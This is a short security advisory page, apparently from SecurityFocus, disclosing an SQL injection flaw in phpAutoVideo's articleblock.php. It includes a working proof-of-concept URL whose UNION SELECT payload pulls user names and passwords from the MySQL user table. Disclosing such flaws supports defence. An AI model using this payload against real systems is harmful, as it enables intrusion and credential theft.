Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Agares Media phpAutoVideo 'articleblock.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept is available:

http://www.example.com/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*







 

Privacy Statement
Copyright 2008, SecurityFocus